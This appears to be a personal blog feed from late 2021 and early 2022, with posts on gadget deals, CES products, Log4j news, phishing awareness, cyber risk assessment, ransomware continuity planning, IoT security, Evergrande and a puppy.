I agree with Daniel Miessler (h/t), some news away from the crazy
Gadgets 01/15/2022: CES tech, DJI Mavic drone, Best Buy TVs, Galaxy entry level phone
Late stuff from CES:
This is a slick projector, but looks like currently out of stock at both Amazon and Samsung. 180 degrees, speaker sound waves in all directions, streaming apps, playlist, voice assistants. “The projector optimizes screen size, auto-focuses, and levels the image even when pointed on an angle.” Also adjusts the color temperature of the projector to accommodate non-white walls, and has built-in Samsung Smart TV.
https://www.amazon.com/SAMSUNG-Freestyle-Projector-Built-SP-LSP3BLAXZA/dp/B09NDXB72V
New Garmin smartwatch with phone call and voice assistant support, and AMOLED display.
https://www.garmin.com/en-US/p/730659
This is crazy cool stuff. Is foldable tech maturing?
More CES tech
Best of CES 2022: Gaming Gear, PCs, Home Entertainment, Transportation | WIRED
Other stuff:
I’m not a drone guy, but ZDNet raving about this for 2022.
https://www.zdnet.com/article/dji-mavic-3-the-very-best-drone-for-2022
These deals are wow. Want to upgrade one of my TVs.
https://www.zdnet.com/article/snag-these-65-inch-flat-screens-at-best-buy-for-less-than-500
Got one of these entry level phones for my mom. Simple and does all she wants. I really don’t know why you would need anything else.
https://www.samsung.com/us/smartphones/galaxy-s21-5g/buy/galaxy-s21-5g-128gb-unlocked-sm-g991uzaaxaa
New iPhone vuln allows camera use when off
Cyber Risk Assessment, Pt. II
3. Vulnerability Assessment (also known as “security posture assessment”) – An in-depth examination of the assets from the inventory to gauge their weaknesses or vulnerabilities. [Our] vulnerability assessments uncover gaps in your security and drive our overall risk management. While threats can come from both inside and outside your organization, vulnerabilities are internal factors. We look for your organization’s structural flaws and weaknesses, how effective your current safeguards are (vulnerability appraisal), and the weaknesses that remain in spite of them. We captures a picture of your network’s and data’s security. Every possible contingency will be gauged for multiple vulnerabilities. Our team’s diverse backgrounds and experience enables us to consider all the weaknesses specific to your organization. Testing cyber infrastructure is an indispensable part of what we do. We use industry-standard tools like Nessus, Nmap, and Metasploit to test for vulnerabilities, examining every available host, services, OS, ports, firewalls, software and firmware vulnerabilities, unencrypted and sensitive data, and permissions. We may also conduct penetration testing and red team-blue team exercises, and examine your data that is online right now that may aid in a threat actor’s social engineering tactics. Continue reading “Cyber Risk Assessment, Pt. II”
Business Continuity in the Age of Ransomware
The goal of Disaster Recovery Planning is to enable a company to continue doing business in the least amount of interruption. Parts of the plan should include:
1. Which data and systems are backed up, as well as specific details like where the backups should be kept, how frequently are they made, and how the data can be recovered.
2. Details on network topology, redundancy and agreements with Internet Service Providers.
3. Contact information for the team who are charged with response and recovery.
4. The process for testing the DRP.
5. A plan for managing the crisis, including dealing with outside contacts, and communicating with the media, law enforcement and legal counsel.
The goal is to decrease the risks of losing critical data.
Ransomware disaster recovery is one of the essential tasks that a company should engage in, but other crises can also be averted or dealt with through this sort of plan.
Makes sure to keep MalwareBytes NY resolutions
Per MalwareBytes (and me):
Say “yes” to updates
Installing updates promptly is one of the best ways to be more cybersecure. Next time an app offers you an update, click “yes” instead of “no”, “cancel” or “remind me later”. (Do you know where it came from?)
Say “no” to feeble passwords
Strong passwords keep your data safe, so don’t let yourself choose feeble passwords in 2022, and if somebody shares a password with you, or asks for yours, just say “no.” (My passwords are generally very strong with financial, job or security sites.)
Say “woah” to unexpected messages
Scams come in all shapes and sizes, but no matter how they’re dressed up, they always want something valuable, URGENTLY. So don’t be rushed—take your time in 2022.
(Remember: if it sounds too good to be true…)
Geek risk management
An asset provides value to user or company and has a relative worth.
Assets are people, physical assets (computers, network equipment), and IT assets (HW, SW, data). An asset’s relative worth is determined through its positive economic value and can have different values based on criticality to the organization.
Asset – in this case Joe Dork’s 1990s collection of Star Trek TOS VHS cassettes.
Vulnerability – Unlocked basement door to Dork’s room in parents’ home.
Vector – Going through the unlocked door.
Threat Actor – Beautiful cosplay girl.
Threat – Theft of tapes.
Risk – Stolen VHS.
Not only are your direct assets something to catalog, but you should also assess your supply chain assets, in all steps from supplier to consumer. Vendors should be cataloging their assets and the threats to it. The SolarWinds hack came from a supply chain vulnerability.
There’s zero chance that Dork’s VHS assets will be stolen by any cosplay girl, but you must perform a continuing asset inventory before any exploitation of vulnerabilities takes place.
Puppy training – or the lack thereof
Jax is learning–I hope. This biting problem is a chore to stop. But from my study, relationship is the important part and letting them know that biting is unacceptable. Verbal cues.
China real estate crisis update
The US Federal Reserve warned last year that trouble in Chinese real estate could damage the global economy.
Evergrande stock: China’s property developer suspends trading in Hong Kong – CNN
We should be concerned about IoT devices
The Internet of Things (IoT) sounds like some kind of set of devices which we don’t have to be concerned about, e.g. “it’s only a thermostat (or a bedroom light).” But IoT can also be comprised of smartphones, printers, self-driving cars, Google Home, Amazon Alexa, Apple Homekit, wearables, door locks, connected LEDs, laptops, pacemakers, hospital devices, assisted living companions, microchipped animals, smart padlocks (possibly accessed by fingerprint), smart toys and other sensors. So systems that were intended to make life easier can also make security and privacy a concern. (Baby monitors and toys listening or talking to your child). Continue reading “We should be concerned about IoT devices”
Happiest of New Years!
Just thinking of the recovery this year, just a bit. Here’s to hoping the new year will excel. Let Jax take last year out.
Packages and Rescue Packages: Online Consumerism Shields a Brewing Storm
UPDATE 01/03/22 Evergrande stock: China’s property developer suspends trading in Hong Kong – CNN
While we’re shopping from Amazon (or at the mall?), ominous events are taking place in the investment world: China’s largest real estate company, Evergrande—with 200,000 employees and more than 1,300 developments in more than 280 cities–has defaulted on its $300 billion debt. This despite having real estate sales of $110 billion last year. Why is this significant? Never mind the awful consequences of our complete social shutdown—depression, suicide, drinking and drug use, reckless Covid relief and stimulus—the U.S. pension system and insurance funds are heavily invested in the collapsing Chinese real estate bubble and consequently, have lost billions. Other Western nations are in a similar bind. Continue reading “Packages and Rescue Packages: Online Consumerism Shields a Brewing Storm”
Americans lost $148 million to gift card scams this year
Gift cards should never be used to pay bills or the government for taxes, etc. Gift cards should always be used to buy gifts.
This goes to show you the wisdom of the elders: if something sounds too good to be true, it probably is. Don’t let your guard down.
Report Gift Cards Used in a Scam | Federal Trade Commission – YouTube
Reminder: Phishing still way up there in terms of compromise
Reminder: Phishing is still the method of compromise most widely used. 91% of cyberattacks use phishing emails. With ransomware, the number is about 70%.
Phishing is really sophisticated sometimes. You may get phishing emails that look exactly like the real thing and the sites they lead to can have images and layouts stolen from the mimicked website.
Spearphishing is a targeted attack against certain individuals at an organization. Whaling is directed at big names at an org, typically a CEO or CFO–or someone with purchasing power since money transfers are the goal.
Smishing uses SMS (text) messages to get you to click and vishing uses phone calls or voice messages to get a target to do something the threat actor wants.
Don’t click. Don’t open attachments. Don’t even respond.
Merry Christmas!
Trump fading
I am struck by those whom I know who are insistent that the election was fraudulent, but you have to hand it to the Democrats. They got out the vote like they never had before. Now his star is waning.
Encrypted messaging apps mostly keep your privacy
Log4j continued
Merry Christmas.
CISA “published an emergency directive on Friday urging all government agencies to immediately ‘patch’ computer systems to address the Log4j flaw. ‘The Log4j vulnerability is the most serious vulnerability that I have seen in my decades-long career,’ CISA Director Jen Easterly.”
“Even the Microsoft-owned online video game Minecraft has been affected. Some hackers were apparently able to breach victims by typing a single line of code into the game’s chat box, according to Wired. Microsoft says it has since fixed the issue and is urging players to update their Minecraft software.”
Why is the Log4j cybersecurity flaw the ‘most serious’ in decades? (nypost.com)
Gadgets 12/18/2021: Galaxy Z Flip 3, Tiles, Portable power station, camping solar panels, Galaxy Tab A7, Surface Pro 8, Ear buds
Want.
https://www.amazon.com/dp/B097CNP994/ref=asc_df_B097CNP9941639738800000
I bought some of these for my mom, but nope, didn’t last long. I’m not one who loses their stuff, but I recommend this one if you do.
https://www.amazon.com/Tile-RE-20002-Pro-2-Pack/dp/B07W73NGMW
Sweet power source Batman!
https://www.amazon.com/Jackery-Portable-Power-Station-Generator/dp/B07D29QNMJ
Also for camping, but I had a small solar panel and it was not impressive.
https://www.amazon.com/Jackery-SolarSaga-Explorer-Portable-Generator/dp/B07PGS2WN8
I do need a new tablet. (I have an old, unused iPad.)
https://www.walmart.com/ip/SAMSUNG-Galaxy-Tab-A7-32GB-10-4-Wi-Fi-Gray-SM-T500NZABXAR/882296471
But if I were to get a Surface…This one is $200 off.
https://www.microsoft.com/en-us/d/surface-pro-8/8qwcrtq8v8xg?icid=deals-page_Store_COUNTDOWN22_R1_CP4_SurfacePro8_121721&activetab=pivot%3aoverviewtab
And if you like ear buds
https://www.walmart.com/ip/Google-Pixel-Buds-A-Series-Truly-Wireless-Earbuds-Audio-Headphones-with-Bluetooth-White/620970985
——
Wired has this story about how Macy’s, Target, Bloomingdales, The North Face, Old Navy and other retailers are on the heels of Amazon with free shipping and 25% off.
https://www.wired.com/story/move-over-amazon-catching-up-macys-target
log4j vuln hits millions of devices
UPDATE 12/15/2021: A second vuln in log4j (patch for the first vulnerability was “incomplete.”) It’s been exploited in the wild.
As Daniel Miessler says “Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
- The project is maintained by very few people in their spare time for no money, and
- If the project had a major issue it would disrupt the entire internet.We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.”
Cybersecurity official warns software vulnerability could affect millions of devices (msn.com)